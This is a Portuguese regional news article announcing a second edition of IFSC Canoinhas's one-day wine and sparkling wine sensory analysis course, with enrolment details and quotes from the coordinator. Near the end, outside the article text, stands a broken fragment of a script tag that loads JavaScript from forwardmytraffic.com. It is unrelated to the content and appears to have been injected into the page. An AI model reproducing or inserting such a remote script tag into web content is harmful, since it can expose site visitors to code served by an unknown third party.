InícioDestaqueIFSC terá 2º edição do curso de Análise Sensorial de Vinhos e...

IFSC terá 2º edição do curso de Análise Sensorial de Vinhos e Espumantes, Inscrições aberta

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Devido ao sucesso da primeira turma, o Câmpus Canoinhas do Instituto Federal de Santa Catrina (IFSC) realiza mais uma edição do curso de Análise Sensorial de Vinhos e Espumantes, no dia 11 de julho. As inscrições estão abertas e devem ser feitas até 4 de julho, pela internet, no Sistema Integrado de Gestão de Atividades Acadêmicas (Sigaa). Podem participar alunos e servidores do IFSC e membros da comunidade externa, com mais de 18 anos. São 15 vagas disponíveis e a seleção será por sorteio.

 

O curso terá oito horas de duração, das 8h às 12h e das 13h30 às 17h30, e vai abordar os seguintes temas: o que é vinho, a arte de servir, aspectos básicos relacionados à enogastronomia e análise visual, olfativa e gustativa. Na parte prática, serão degustados diferentes estilos de vinhos e espumantes.

 

Na primeira edição, realizada no dia 18 de maio, o curso teve 171 inscritos para 15 vagas e superou as expectativas da organização. “Tivemos o retorno de muitos participantes elogiando o formato e a didática do curso e já demonstrando interesse em mais cursos na área de vinhos. Foi um dia de muito aprendizado, conhecimento e troca de experiências entre os participantes”, avalia o coordenador do curso e sommelier, Douglas André Wurz.

 

Por isto, professor Douglas explica que foi elaborada uma pré-agenda com um curso por mês durante este ano, de análise sensorial, serviço do vinho, enografia e introdução ao mundo dos espumantes. “É um conjunto de ações que tem como objetivo divulgar a cultura do vinho, relacionando a importância do consumo regular e moderado para a saúde humana, além de capacitar os participantes sobre as técnicas de degustação”, conta.

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.